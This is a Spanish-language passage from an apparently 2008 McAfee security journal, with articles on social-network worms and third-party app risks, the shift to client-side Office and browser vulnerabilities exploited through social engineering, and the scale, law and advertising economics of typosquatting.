Dos aos y medio despus de que hiciera su aparicin samy, el primer gusano de redes sociales de propagacin generalizada (aparecido el 4 de octubre de 2005), la mayora de las vulnerabilidades de seguridad han sido ya corregidas. Pero eso no quiere decir que el problema haya desaparecido. Mientras los fallos de seguridad no consigan reducir el nmero de suscriptores, las vulnerabilidades sern moneda comn. adems, las vulnerabilidades de secuencias de comandos entre sitios, como las que aprovechaba samy, se encuentran entre las ms registradas en la base de datos de vulnerabilidades y exposiciones comunes (cVe)1. y es de esperar que la situacin empeore antes de que asistamos a una mejora. en mayo de 2007, Facebook lanzaba la plataforma Facebook, que permita a desarrolladores de terceros crear y comercializar aplicaciones entre sus 20 millones de usuarios activos. Un ao y otros 50 millones de usuarios ms tarde, se han desarrollado ms de 20.000 aplicaciones de Facebook, y el 95% de los usuarios han ejecutado al menos una de ellas2. estas aplicaciones representan riesgos adicionales; los usuarios pueden tener un falso sentido de seguridad derivado del hecho de que asocian las aplicaciones con un sitio en el que confan: Facebook.com. sin embargo, la realidad es que en la mayora de los casos el sitio no realiza una revisin previa a la comercializacin de las aplicaciones. en enero de 2008, Facebook censur la aplicacin secret crush cuando se supo que convenca a los usuarios para instalar la aplicacin de adware Zango3. (en la Figura 1 se incluyen ejemplos de amenazas generalizadas.) es conveniente destacar que Facebook no revisa las aplicaciones y que la situacin puede rsele de las manos, como, de hecho, ya ha ocurrido. aunque este caso no supuso ms que una molestia (adware), el siguiente podra ser mucho peor.
Amenazas de redes sociales descritas
AMENAZA TIPO SITIO

Cada vez que hace clic en un vnculo, valora un blog o chatea sobre un tema especfico, el sitio adquiere sobre usted datos para mejorar su red social.

aproximadamente nueve meses despus de que Facebook lanzara su plataforma, Myspace hizo lo propio. google ha lanzado tambin recientemente una interfaz de programacin de aplicaciones (aPI) para orkut, su sitio de red social. aunque estas plataformas han creado el marco para la prxima generacin de sitios de redes sociales, tambin son responsables de la creacin de otro vector que pueden aprovechar los agresores.

Qu nos depara el futuro?

los sitios de redes sociales que aparezcan en el futuro tendrn una mayor repercusin debido a que las plataformas alcanzarn mayores niveles de ampliacin. las nuevas aplicaciones incluirn informacin de movilidad, presencia y ubicacin, con el objetivo de facilitar la vida fsica del usuario a travs de su red virtual; los usuarios tendrn una red social porttil en el bolsillo. no slo podrn saber qu amigos de la red estn conectados, sino que tambin podrn saber si hay alguno cerca. los sistemas de triangulacin de torres celulares y de posicionamiento global informarn de la ubicacin de los usuarios a todas las personas que stos autoricen. los servicios de localizacin geogrfica podran mostrar los comercios locales y las atracciones adecuados segn sus intereses, basndose en su perfil. las personas en viaje de negocios podran organizar ms fcilmente las reuniones con colaboradores y clientes, en congresos y ferias comerciales. la emocin de las citas online podra aumentar a travs de la creacin de comunidades en lugares determinados, por lo que no slo conocera a alguien a travs de Internet, sino que tambin podra chatear con una pareja potencial en la misma habitacin. los sitios sociales ganarn en inteligencia, ya que podrn extraer informacin del usuario de toda la Web. sitios de marcadores sociales, como Digg, se uniran a las redes sociales y mejoraran gracias a la tecnologa de autoaprendizaje, como Pandora o stumbleUpon y la funcionalidad de etiquetado, como Flickr. el resultado es un flujo constante y perfeccionado de informacin relevante, que educa e informa a la comunidad de una manera mucho ms eficaz que en la actualidad. Podr recibir recomendaciones de los miembros de su red directamente en su iPhone. Podr, por ejemplo, leer reseas que sus amigos han considerado interesantes y averiguar el horario de la funcin en los teatros cercanos. Despus, podr comprobar dnde se encuentran sus amigos para saber cunto tiempo tardarn en reunirse con usted. los sitios conocern sus intereses en funcin de su comportamiento: por ejemplo, los sitios Web que visita, los artculos que lee, la msica que escucha, los amigos con los que chatea y los intereses de stos. esta informacin servir para mantenerle al da sobre cambios en los eventos y para filtrar el "ruido" que tienen que soportar los usuarios
oToo 2008 29

Grey Goo JS/QSpace JS/SpaceFlash JS/SpaceTalk Gusano Kut Prdida masiva de fotos privadas PWS-Banker! 1d23 Samy Scrapkut Secret Crush Gusano Xanga

gusano gusano gusano ladrn de informacin gusano fuga de datos ladrn de contraseas gusano gusano programa no deseado gusano

Second Life MySpace MySpace MySpace orkut MySpace orkut MySpace orkut FaceBook Xanga

Figura 1: Los gusanos y otras amenazas inundan los sitios de redes sociales. Con frecuencia los usuarios confan demasiado en los sitios de su comunidad.

en la actualidad. el resultado ser una experiencia Web enormemente personalizada que requiere una mnima intervencin directa del usuario. si consideramos que la Web 1.0 estaba controlada por los administradores de los sitios y la Web 2.0 por el contenido generado por los usuarios, el futuro de las redes sociales est en la mejora de las relaciones entre el usuario y el contenido, basada en que el comportamiento del usuario permite adaptar el contenido. en las primeras encarnaciones de los sitios de la prxima generacin, llamadas redes sociales 3.0, puede llegar incluso a sobrecoger el nivel de exactitud de la inteligencia artificial. la generacin de perfiles adquiere un significado distinto en este reino, donde el sitio puede realmente reunir a usuarios de intereses similares. en algunos aspectos, la generacin de perfiles de compatibilidad que utilizan las agencias de contactos online se podra considerar una encarnacin anticipada de la creacin de conexiones sociales a travs de la generacin de perfiles online para unir a personas compatibles; sin embargo, en las redes sociales 3.0, este concepto se ampla de manera importante sin necesidad de rellenar un extenso cuestionario. cada vez que hace clic en un vnculo, valora un blog o chatea sobre un tema especfico, el sitio adquiere sobre usted datos para mejorar su red social. Quin se beneficia de esta explosin de correlacin de informacin? Qu duda cabe que la base de usuarios es un factor desencadenante, pero hay tambin otros que intentan beneficiarse de esta circunstancia. a los anunciantes se les hace la boca agua cuando piensan en tasas de conversin ms elevadas cuando el marketing se desarrolla a nivel de usuarios, en funcin de sus intereses especficos. Prestarn atencin a la publicidad ms usuarios y, por lo tanto, se interesarn en su contenido.

el uso cada vez mayor de perfiles abiertos y porttiles, aplicaciones Web hbridas (aplicaciones que combinan contenido de varias fuentes en una sola herramienta) e interfaces aPI abiertas facilitarn enormemente el uso entre sitios, pero al mismo tiempo aumentar la complejidad a la hora defenderse frente a las amenazas que tienen como objetivo estos vectores. en la actualidad los ataques que emplean varias capas son difciles de localizar y lo sern ms an en el futuro. los ataques pueden generarse en un solo sitio nicamente para propagarse a travs de otro antes de aparecer en una red social infectada. las defensas basadas en host tendrn que negociar las relaciones que mantienen los sitios entre s para reconstruir las interacciones vlidas y no vlidas entre sitios, y poder separar el grano de la paja. es muy probable que muchos usuarios consideren las preocupaciones sobre la privacidad que incluye este artculo, recopilacin y correlacin de informacin, y seguimiento de ubicaciones, demasiado importantes para ser ignoradas. De hecho, mucha gente decidir no participar en estos servicios. sin embargo, cuando los usuarios vean que se pueden beneficiar proporcionando un poco de informacin y que han establecido relaciones de confianza, muchos de ellos no dudarn en ofrecer ms detalles. los proveedores estn plenamente al corriente de este hecho y animan a los usuarios a ir paso a paso, por ejemplo, permitir que se comuniquen las ubicaciones de forma especfica, nicamente por provincia o ciudad. Desafortunadamente, los predadores online estarn al acecho y las vulnerabilidades de seguridad pueden tener funestas consecuencias cuando esta informacin cae en manos de los ciberdelincuentes. este es un momento apasionante para los sitios de redes sociales, que se amplan con rapidez, aaden funcionalidades y aumentan sus bases de usuarios. estos sitios estn tasados en miles de millones de dlares. se vislumbran grandes cambios, a la vez emocionantes e intimidatorios; desde muchos puntos de vista, el futuro de los sitios de redes sociales define el futuro de la propia Internet.

Mayores riesgos
as como aumentan las ventajas para el usuario, tambin se incrementan las oportunidades para los agresores. los creadores de spam y los falsificadores buscarn la manera de aprovechar esta mina de informacin y la utilizarn para generar ms fcilmente ataques de ingeniera social convincentes. el nivel de detalle y personalizacin de los mensajes del ataque coger a los usuarios por sorpresa. las redes de bots sociales tambin dispondrn del potencial para perturbar seriamente el ecosistema, envenenando la red con molestas peticiones y falsos testimonios. los administradores de sitios se vern obligados a corregir muchos errores para mantener un nivel de calidad elevado, conseguir detener a los ciberdelincuentes al tiempo que permitir al resto realizar un uso adecuado el sitio. la proteccin de las redes sociales futuras depender principalmente de las defensas del lado del servidor. los sistemas servidor debern analizar grandes cantidades de datos entrantes y salientes en bsqueda de rastros de cdigo daino o maligno. los servicios de clasificacin de la reputacin de los sitios y el contenido pueden ayudar a encontrar un equilibrio entre usabilidad y seguridad. la relacin de confianza entre sitios y usuarios es clave para el xito de las redes del maana. romper esa confianza puede tener consecuencias nefastas para toda la comunidad.

el investigador en materia de amenazas informticas Craig Schmugar lleva desde el ao 2000 investigando y luchando contra amenazas para Mcafee avert labs. Durante todo este tiempo ha descubierto y clasificado miles de amenazas nuevas, entre ellas, los gusanos Blaster, Mydoom, Mywife y sasser. admite que durante este tiempo ha empezado a sentirse un poco ms "insociable".

NOTAS
1 http://cwe.mitre.org/documents/vuln-trends/index.html 2 http://www.facebook.com/press/info.php?statistics 3 http://www.zdnet.com.au/news/security/soa/spyware-claims-kill-off-Facebooks-secret-crush/0,130061744,339284896,00.htm?omnref=http://www.google. com/search?num=100

30

McaFee secUrITy JoUrnal

la nueva cara de las vulnerabilidades

Rahul Kashyap

si bien es cierto que la ingeniera social no interviene en todas las formas de amenazas de seguridad, ltimamente Mcafee avert labs ha observado una tendencia creciente: los creadores de malware hacen uso de la ingeniera social para aprovechar las vulnerabilidades del software.
la mayor parte de los tristemente clebres gusanos de Internet aparecidos en la primera mitad de la dcada aprovechaban en su mayora una o varias vulnerabilidades de las aplicaciones de Microsoft. los conocidos sasser, Blaster, code red y sQl slammer tenan un factor en comn. (Por cierto, avert labs descubri sasser y Blaster, as como otro malware importante.) Todos ellos aprovechaban vulnerabilidades de servidores. estaban concebidos para, tras aprovechar los fallos de los servidores, servirse de su rpida autopropagacin para destruirlos. a pesar de que otras aplicaciones pertenecientes a un gran nmero de proveedores han sido vctimas de brechas de seguridad similares, en este artculo nos centraremos en las vulnerabilidades y tendencias en aplicaciones de Microsoft. con ello no pretendemos decir que Microsoft sea particularmente vulnerable, sino que reconocemos que la popularidad de sus aplicaciones entre particulares y empresas ha convertido a esta empresa en el objetivo principal de los creadores de malware y los ladrones de datos. avert labs ha constatado que, gracias a las medidas de seguridad adoptadas para proteger las llamadas de procedimientos remotos, las vulnerabilidades de los servidores que pueden ser aprovechadas por gusanos han experimentado un descenso en los ltimos aos. Para ilustrar estos datos, en la Figura 1 se muestran las vulnerabilidades susceptibles de ser aprovechadas de forma remota a travs de llamadas de procedimientos remotos de Microsoft Windows durante un perodo de 10 aos y hasta el primer trimestre de 2008. se puede observar como la tendencia ha descendido de manera importante en los ltimos dos aos. observamos una tendencia similar si nos fijamos en las vulnerabilidades susceptibles de ser explotadas en otras populares plataformas de servidor de Microsoft, como IIs Web server, sQl server y otras. Microsoft fortaleci an ms sus defensas con la publicacin del service Pack 2 para Windows XP. Junto con otros mecanismos de proteccin, el sP2 inclua la prevencin de ejecucin de datos2, que, si bien no era infalible3, sin duda ayud a frenar la propagacin de gusanos de red que hasta ese momento acosaba a Windows. los efectos del sP2 de XP se hicieron mucho ms patentes un par de aos despus, cuando un gran nmero de usuarios realizaron la migracin al sistema operativo actualizado. sin embargo, los creadores de malware no se iban a dejar vencer. no tardaron mucho en cambiar de objetivo, pasando de servidores a clientes, y destapando vulnerabilidades en Microsoft office, Microsoft Internet explorer y varios formatos de archivo de marca registrada. el asalto a los clientes dio lugar a una gran cantidad de los denominados "fuzzers"4 (cuyo objetivo es buscar brechas de seguridad mediante el lanzamiento de datos aleatorios a una aplicacin), errores de anlisis de lenguaje de secuencias de comandos y vulnerabilidades relacionadas con controles activeX. Proyectos como el llamado Mes de los errores de navegador5 (y otros), axfuzz6, coMraider y hamachi7 hicieron crecer el inters en esta rea y ayudaron a poner de manifiesto los innumerables problemas que acosan al software
Parches de vulnerabilidades remotas de Microsoft
14 12 10 8 6 4 2 0 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008

Figura 1: Desde 2006, Microsoft ha reforzado considerablemente la seguridad de sus llamadas de procedimientos remotos. (Fuente: Microsoft1).

oToo 2008

31

45 40 35 30 25 20 15 10 5 0

Parches para vulnerabilidades de Microsoft Office

ataques dirigidos a un objetivo

la clave de las vulnerabilidades de los clientes radica en que para poder ser aprovechadas requieren la intervencin del usuario. De ah que los creadores de malware se hayan visto obligados a ingeniar ideas ms innovadoras para atraer a los usuarios y conseguir que hagan clic en vnculos, y descarguen imgenes y documentos de Internet. Una de las principales ofensivas sobre los sistemas cliente ha sido el rpido crecimiento del spam basado en la ingeniera social. la ingeniera social y el inters actual en las vulnerabilidades de los clientes van de la mano. la relacin entre estos dos factores es obvia y, ltimamente, la amenaza ha pasado a ser ms compleja.

1998

1999

2000

2001

2002

2003

2004

2005

2006

2007

2008

Figura 2: Las vulnerabilidades de Microsoft Office aumentaron en 2006 y han seguido ese ritmo en los dos aos posteriores. (Fuente: Microsoft).

cliente. Durante este perodo, el descubrimiento de errores y el aprovechamiento de vulnerabilidades en aplicaciones cliente han vivido su momento lgido; esta tendencia contina incluso mientras preparamos esta revista. no resulta fcil determinar el nmero de aplicaciones cliente que sufren ataques, pero algunas fuentes aseguran que se trata de cientos de millones8. en la Figura 2 se ofrece una clara muestra del acusado incremento de las vulnerabilidades relacionadas con Microsoft office. aunque el peor momento se vivi en 2006, todava hoy es un problema que mantiene la atencin de Microsoft. la mayora de estas vulnerabilidades han afectado a office 2000. esta versin es la ms utilizada, y por lo tanto la que sufre un mayor nmero de ataques. Desde el punto de vista econmico, las vulnerabilidades en office 2000 son las ms rentables para los creadores de malware. el motivo principal es que esta suite ha tenido durante mucho tiempo un gran inconveniente para la seguridad: los usuarios de office 2000 deben visitar la pgina de actualizaciones office update de Microsoft para descargar parches9 y las actualizaciones online automticas no se ocupan de office 2000 ni de office 97. este descuido ofrece a los creadores de malware una oportunidad excepcional para aprovecharse de que muchos usuarios rara vez actualizan sus suites office10. el nmero de equipos zombi invadidos a causa de este tipo de brecha de seguridad podra alcanzar las decenas de miles. aunque, como ya hemos sealado, en este artculo nos ocupamos principalmente de las vulnerabilidades de las aplicaciones de Microsoft, la tendencia afecta a otros conocidos proveedores de software cliente, como adobe, Mozilla o apple, entre muchos otros. el llamado Mes de errores en apple puso de relieve muchos problemas de los clientes y se ha producido un fuerte repunte en las vulnerabilidades encontradas en aplicaciones de software de uso generalizado, como apple QuickTime, adobe Flash Player y reader, por nombrar slo algunas. el reciente aprovechamiento de la vulnerabilidad relacionada con la funcionalidad mailto: y los archivos PDF (cVe-2007-5020)11, y de Flash mediante el uso de actionscript (cVe-2007-0071) fueron algunos los problemas crticos que afectaron a miles de usuarios.

Parte de esa complejidad reside en los ataques de ingeniera social dirigidos a un objetivo, que son la tendencia emergente en el panorama de amenazas. estos ataques son especialmente populares en instalaciones militares y de defensa12. Desde la plaga de vulnerabilidades de Microsoft office en 2006, han salido a la luz varios informes sobre algunas agencias gubernamentales que han recibido mensajes de correo electrnico con archivos malignos de Word, PowerPoint o access. Parece que la combinacin de la ingeniera social y las vulnerabilidades ha encontrado otro objetivo: el espionaje. est claro que espiar es una prctica ms furtiva y difcil de descubrir que los ataques con un mero objetivo econmico. en muchas ocasiones, las vulnerabilidades descubiertas en estos documentos incrustados maliciosos han sido ataques de tipo zeroday (da cero), lo que hace que estos documentos sean todava ms difcil de detectar: con frecuencia, slo se detectan cuando el dao ya est hecho. el hecho de que estas vulnerabilidades de tipo zero-day hayan estado dirigidas a instalaciones gubernamentales o militares especficas hace pensar que estos ataques estn financiados por agentes o gobiernos extranjeros. Ingeniera social especialmente diseada, vulnerabilidades de tipo zero-day, dinero y poder son elementos que nos transportan a una novela de John le carr. Pero algunos analistas de seguridad piensan que esto no es ficcin. las predicciones de muchos tericos apuntan en la direccin de que las guerras de la prxima generacin se librarn en el ciberespacio sern estos acontecimientos sencillamente experimentos para preparar una ciberguerra?

Piratas furtivos de la Web

otros ataques en los que se ha observado ltimamente un cambio de comportamiento son la piratera y el secuestro de servidores Web. en el pasado, tras asaltar los sitios Web, los agresores los marcaban, generalmente dejando una nota con la esperanza de hacerse famosos. esto ya no ocurre, al menos con la nueva generacin de sofisticados piratas. ante la pltora de vulnerabilidades de clientes, los piratas informticos han comenzado a aprovecharlas de manera coordinada. Para propagar el malware, en primer lugar atacan sitios Web muy visitados, dejan el malware de manera inadvertida y atraen a los usuarios a travs de trucos de ingeniera social.

32

McaFee secUrITy JoUrnal

como ejemplo destacado de esta tcnica merece la pena mencionar el ataque realizado en febrero de 2007 a la super Bowl (final de ftbol americano). en este caso, los piratas insertaron cdigo Javascript maligno en la pgina de inicio del sitio oficial13. la secuencia de comandos aprovechaba dos fallos en Internet explorer e infectaba a los usuarios que no tenan instalado el parche con un troyano que se conectaba a un servidor chino, proporcionando acceso total al equipo infectado. se ha tenido conocimiento de ataques similares a muchos sitios Web muy visitados, incluidos los de embajadas, grupos de noticias y grandes empresas. otra nueva amenaza que ha puesto en riesgo a millones de hogares consiste en aprovechar los enrutadores domsticos a travs de Universal Plug and Play, lo que permite a un archivo Flash maligno incrustado en una pgina Web reconfigurar el enrutador de la vctima14. (el hecho de que la inmensa mayora de los usuarios utilicen las contraseas predeterminadas en los enrutadores de sus hogares explica el xito de este ataque.) en esta situacin, para atraer a la vctima se podra utilizar cualquier vnculo aparentemente inofensivo para pagar facturas online o leer ms sobre un tema determinado. lo ms probable es que el usuario no tenga ni idea de que el enrutador ha sido atacado, haciendo que todo el trfico, incluidas las contraseas ms confidenciales, se enve a un tercero.

as como el desarrollo de tcnicas de ataque fiables, como la denominada "heap spray"17, ganan en popularidad. Muchos de estos errores han estado ah desde hace mucho tiempo y siempre se consideraron como imposibles de aprovechar. Podra ser el momento perfecto para que estas tcnicas aprovechen los trucos de ingeniera social como uno de los vectores de ataque por las siguiente razones:

en la actualidad no existen mtodos automticos y fiables conocidos, para aprovechar estas nuevas tcnicas (principalmente para la propagacin masiva). Pueden probarse fcilmente en individuos o grupos elegidos, a travs de la ingeniera social como parte del proceso de desarrollo. la rentabilidad de estas tcnicas es mayor si se utiliza la ingeniera social que si se dedican los esfuerzos a aumentar la investigacin para conseguir la propagacin masiva.

conclusin
las tendencias recientes en vulnerabilidades convierten a la ingeniera social en una fuerza difcil de combatir. no importa cuntos mecanismos de proteccin implementen los proveedores en su software y en sus sistemas operativos, mientras los usuarios sigan haciendo clic en cualquier vnculo que les salga al paso, la ingeniera social los desarticular todos. al menos a corto plazo, no parece que podamos esperar la aparicin de "ciberleyes" que pongan freno a la ingeniera social (excepcin hecha de los casos de fraude); sin embargo, una mejor educacin puede sin duda ayudar a minimizar las prdidas y el impacto sobre las vctimas desprevenidas. Mientras tanto, pinseselo dos veces si le piden que haga clic para aceptar el premio que acaba de ganar.

nuevos vectores de ataque

en la primera mitad de esta dcada hemos observado un gran aprovechamiento de desbordamientos de pila, memoria heap (o memoria dinmica) y enteros, vulnerabilidades de cadenas con formato y otros errores, la mayor parte de los cuales con relativamente fciles de aprovechar desde el punto de vista tcnico. en la actualidad, sin embargo, la mayora de estos sencillos desbordamientos de pila ya no suponen una gran amenaza en software muy utilizado, como Windows, gracias al excepcional desarrollo del software y a las pruebas de control de calidad. adems, tecnologas como la aleatorizacin del esquema del espacio de direcciones (aslr) han forzado a los piratas informticos a dejar atrs los mecanismos tradicionales de ataque. el ataque a las vulnerabilidades ha entrado en una nueva fase en la que conceptos como punteros null15 y condiciones de carrera16,

Rahul Kashyap es director de investigacin sobre vulnerabilidades y seguridad de sistemas de prevencin de intrusiones (IPs) para Mcafee avert labs. es responsable de la investigacin de vulnerabilidades, anlisis de vulnerabilidades de tipo zero-day, contenido de sistemas de prevencin de intrusiones y respuesta de emergencia. Kashyap es un gran seguidor de Dilbert y espera poder comenzar algn da su propio cmic satrico acerca de la seguridad.
10 Ms office Flaws Ideal Tools for Targeted attacks. (los fallos en Ms office herramientas ideales para ataques dirigidos a un objetivo) http://blog.washingtonpost.com/securityfix/2006/04/ ms_office_flaws_ideal_tools_fo_1.html 11 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows/ 12 The new e-spionage Threat. (la nueva amenaza del espionaje electrnico) http://www.businessweek.com/print/magazine/content/08_16/b4080032218430.htm 13 Dolphins Web sites hacked in advance of super Bowl. (los sitios Web del Dolphin stadium y de los Miami Dophins pirateados como adelanto de la super Bowl) http://www.networkworld.com/news/2007/020207-dolphins-web-sites-hacked-in.html 14 Hacking the interwebs, (Pirateando la InterWeb) 12 de enero de 2008. http://www.gnucitizen.org/blog/hacking-the-interwebs/ 15 application-specific attacks: leveraging the actionscript Virtual Machine. (ataques especficos a aplicaciones: aprovechando la mquina virtual actionscript) http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf 16 Unusual Bugs, (errores inusuales) Ilja van sprundel. http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf 17 Heap Feng shui in Javascript. (Heap Feng shui en Java script) http://www.determina.com/security.research/presentations/bh-eu07/ bh-eu07-sotirov-paper.html (es necesario registrarse)

NOTAS
1 http://www.microsoft.com/technet/security/current.aspx 2 cmo configurar la proteccin de la memoria en Windows XP sP2. http://www.microsoft.com/spain/technet/recursos/articulos/depcnfxp.mspx 3 analysis of gs protections in Microsoft Windows Vista. (anlisis de las protecciones gs en Microsoft Windows Vista) http://www.symantec.com/avcenter/reference/gs_Protections_in_Vista.pdf 4 Browser Fuzzing for fun and profit.(Incordiar al navegador por diversin y dinero), http://blog.metasploit.com/2006/03/browser-fuzzing-for-fun-and-profit.html 5 Month of Browser Bugs, (Mes de los errores de navegador) http://blog.metasploit.com/2006/07/month-of-browser-bugs.html 6 aXFUZZ: an activeX/coM enumerator and fuzzer. (aXFUZZ: un enumerador y fuzzer de activeX/coM) http://sourceforge.net/projects/axfuzz/ 7 Hamachi, de H D Moore y aviv raff. http://metasploit.com/users/hdm/tools/ hamachi/hamachi.html 8 637 million Users Vulnerable to attack, (673 millones de usuarios vulnerables a ataques) Frequency X. http://blogs.iss.net/archive/TheWebBrowserThreat.html 9 Mantener actualizado el sistema operativo: preguntas ms frecuentes." http://www.microsoft.com/spain/protect/computer/updates/faq.mspx

oToo 2008

33

aventuras involuntarias de navegantes

Benjamin Edelman

Mientras navega por la Web puede verse expuesto a una gran variedad de ataques que se encuentran bien descritos en la publicacin McAfee Security Journal.
Desde banners malintencionados hasta programas de adware, los sitios que pretende visitar pueden causar daos importantes. no obstante, los usuarios tambin deberan ser conscientes de los sitios que no tienen intencin visitar: los sitios a los que llegan por accidente. los navegadores Web aadirn automticamente un .com a un dominio sin dominio de nivel superior, de forma que tambin registran dominios como www.mcafeecom.com. Incluso, algunos se especializan en aadir prefijos http o en registrar el correspondiente .com para dominios que realmente residen en otros dominios de nivel superior. cmo terminan los usuarios en estos sitios de ocupacin tipogrfica? algunos usuarios sencillamente olvidan el nombre exacto del sitio. otros pueden teclear errores. (Pensemos en los que hablan ingls pero no son nativos, en usuarios con visin reducida y en aquellos que todava no estn muy duchos en el uso de un teclado.) Puede que usuarios con poca experiencia no conozcan la puntuacin correcta de la direccin completa de un sitio o que usuarios con prisa introduzcan errneamente una parte de la Url. Incluso los usuarios ms sofisticados pueden cometer errores en un dispositivo mvil con un teclado pequeo, en un tablet Pc con reconocimiento de escritura manual, o durante un recorrido lleno de baches en un automvil. Por tanto, no estara bien culpar a los usuarios de solicitar sitios de typosquatting. al contrario, aunque es verdad que los usuarios terminan en estos sitios, generalmente lo hacen por error.

estrategia bsica
Para los que nos equivocamos de vez en cuando al teclear una direccin Url, existe una clase especial de amenaza de seguridad que hay que vigilar. esta plaga del mecangrafo imperfecto se conoce como typosquatting (ciberocupacin basada en errores tipogrficos). la estrategia del typosquatter es anticiparse a los nombres de dominio que los usuarios podran solicitar de forma accidental. Por ejemplo, un usuario comete un error al teclear bankofamerica.com: teclea dos veces la k y omite la e; el resultado es bankkofamrica.com. normalmente, ese usuario recibira un mensaje de error del navegador, que lo dirigira al sitio correcto de Bank of america. Pero imaginemos que alguien ha previsto el error del usuario. el typosquatter podra tener registrado el dominio mal escrito (y otras variaciones del error tipogrfico) con la esperanza de que los usuarios acaben cometiendo el error y accedan a l. Histricamente, los typosquatters se centraron fundamentalmente en los errores ortogrficos: insertar una letra equivocada, omitir una letra o intercambiar dos letras. Pero, ltimamente, los typosquatters han encontrado otras formas ingeniosas de atraer el trfico involuntario. supongamos que un usuario omite el punto que separa www del nombre de dominio del sitio, por ejemplo, wwwmcafee.com en lugar de www.mcafee.com. los typosquatters pueden registrar ese dominio. (De hecho, alguien lo hizo. Mcafee est intentando recuperarlo.) en el caso de los puntos finales, los typosquatters prevn correctamente que

alcance de este fenmeno

el typosquatting se ha extendido sorprendentemente debido a la gran cantidad de usuarios que cometen algn tipo de error. el servicio Mcafee siteadvisor realiza continuas bsquedas de typosquatters: en la inspeccin de mayo de 2008 llevada a cabo por Mcafee avert labs encontramos ms de 80.000 dominios ocupados asociados a slo los 2.000 sitios Web ms importantes. la incidencia del typosquatting es todava mayor a medida que profundizamos en la Web.

34

McaFee secUrITy JoUrnal

los dominios frecuentados por nios son objetivos particularmente interesantes para los typosquatters. Por ejemplo, un anlisis reciente identific 327 registros diferentes que eran todos variantes cercanas a cartoonnetwork.com. la lista, recopilada con tecnologa siteadvisor, la encabezaba Feecreditreport.com; youTube, craigslist, Wikipedia y Bank of america tambin ocupaban un lugar destacado. (Para conocer las cifras exactas, consulte la Figura 1. y para ver algunos ejemplos de errores ortogrficos creativos, consulte el apndice.)

reaccin legal
en general, la prctica del typosquatting es ilegal en estados Unidos. la ley para la proteccin de los consumidores frente a la ciberocupacin de 1999 (acPa, anti-cybersquatting consumer Protection act), ttulo 15 del cdigo Usc, 1125(d), prohbe el registro, trfico de entrada o utilizacin de nombres de dominio que sean idnticos o puedan confundirse con una marca o nombre famoso. la acPa reconoce daos por los beneficios fraudulentos del typosquatter (ttulo 15 de Usc, 1117(a)(1)), o indemnizaciones entre 1.000 y 100.000 dlares por dominio ocupado (a criterio del tribunal) ( 1117(d)).

las leyes de otros pases tratan el typosquatting de un modo algo distinto, pero la mayora de las naciones ven esta prctica como una infraccin de marca comercial, y por tanto la prohben. adems, la directiva para la resolucin uniforme de disputas (UDrP, Uniform Dispute resolution Policy) establece un arbitraje para las reclamaciones sobre dominios ilegales. Para registrar un sitio en un dominio principal de nivel superior, el registrante debe someterse a la jurisdiccin de la UDrP, por lo que esta directiva se aplica independientemente de la ubicacin del sitio de typosquatting. Dicho esto, las reparaciones de la directiva UDrP se limitan a la confiscacin de un dominio ilegal y no contemplan sanciones econmicas. a pesar de la elevada cuanta de las multas que impone la acPa, los typosquatters parecen ampararse en la escasa probabilidad de ser perseguidos por sus actividades, y la realidad es que continan campando a sus anchas.

estrategia financiera de los typosquatters

Una vez que un usuario llega a un sitio de typosquatting, la intencin del ocupa es conseguir el mayor provecho econmico posible. Hace algunos aos, el famoso typosquatter John Zuccarini oblig a sus involuntarios visitantes a visualizar sitios Web de sexo explcito que ellos no queran ver ni haban solicitado. Zuccarini registr al menos 8.000 dominios, que yo document en su totalidad1. sin embargo, sus actividades no quedaron impunes: en septiembre de 2003, Zuccarini fue arrestado en aplicacin de la ley sobre la autenticidad en los nombres de dominio (Truth in Domain names act), que prohiba expresamente cualquier accin por la que se utilice un nombre de dominio engaoso con la intencin de embaucar a alguien para que vea contenido considerado obsceno. en la actualidad, la propuesta ms comn para los typosquatters es la publicidad. entre los miles de dominios ocupados que he examinado en los ltimos aos, es raro encontrar uno que no tenga anuncios.

DOMINIO

NMERO DE DOMINIOS DE TYPOSQUATTING

freecreditreport.com cartoonnetwork.com youtube.com craigslist.org blogspot.com clubpenguin.com wikipedia.com runescape.com miniclip.com bankofamerica.com dailymotion.com metroflog.com addictinggames.com friendster.com myspace.com verizonwireless.com facebook.com

742 327 320 318 276 271 266 264 263 251 250 249 248 246 239 238 235

El servicio McAfee SiteAdvisor realiza continuas bsquedas de typosquatters: en la inspeccin de mayo de 2008 del McAfee Avert Labs encontramos ms de 80.000 dominios ocupados asociados a slo los 2.000 sitios Web ms importantes.

Figura 1: La lista ms popular de typosquatting. En esta tabla aparece una seleccin de las marcas comerciales ms deseadas por los typosquatters. Los datos proceden de la inspeccin de mayo de 2008 del servicio SiteAdvisor.

oToo 2008

35

Figura 2: Un typosquatter registra un nombre de dominio similar al de un banco importante y luego, indirectamente, vende enlaces publicitarios para ese y otros bancos.

cuando los sitios de typosquatting muestran anuncios, normalmente intentan seleccionar los relacionados con el sitio al que el usuario (con toda probabilidad) trataba de acceder. as, en el ejemplo de bankkofamrica.com mencionado anteriormente, los anuncios resultantes promocionan, como era de esperar, bancos. Qu bancos? el primero de la lista es el propio Bank of america. (Vase la Figura 2). sorprendido? Por una parte, la colocacin de ese anuncio es til para el Bank of america: al menos consiguen llegar hasta el cliente, a pesar de su error al escribir el nombre. Pero, por otra parte, es extraordinario que este typosquatter le pida al banco que pague para llegar a un cliente que ya haba solicitado Bank of america por su nombre. Despus de todo, el typosquatter est infringiendo la marca comercial de Bank of america, contraviniendo exactamente la acPa, que estipula que dicho typosquatter no puede registrar tales dominios y que incluso se le podra obligar a pagar una cuantiosa indemnizacin a Bank of america si el banco presentara una demanda. Pero

en lugar de eso, el typosquatter acaba vendiendo espacios de publicidad a Bank of america, sin que ste, al menos inicialmente, se percate. cmo es esto posible? los typosquatters no venden directamente el espacio a los anunciantes. (Imagnese la conversacin: nos gustara mostrar sus anuncios en nuestro sitio de typosquatting. Que quiere poner nuestros anuncios dnde?) en su lugar, los typosquatters venden sus espacios a redes publicitarias, que a su vez buscan anunciantes. la mayor red en este espacio es google, cuyo producto adsense for domains y otros productos de afiliacin de dominios sirven anuncios en ms del 80 por ciento de los sitios de typosquatting recientemente descubiertos por la tecnologa siteadvisor.

36

McaFee secUrITy JoUrnal

el futuro de los typosquatters

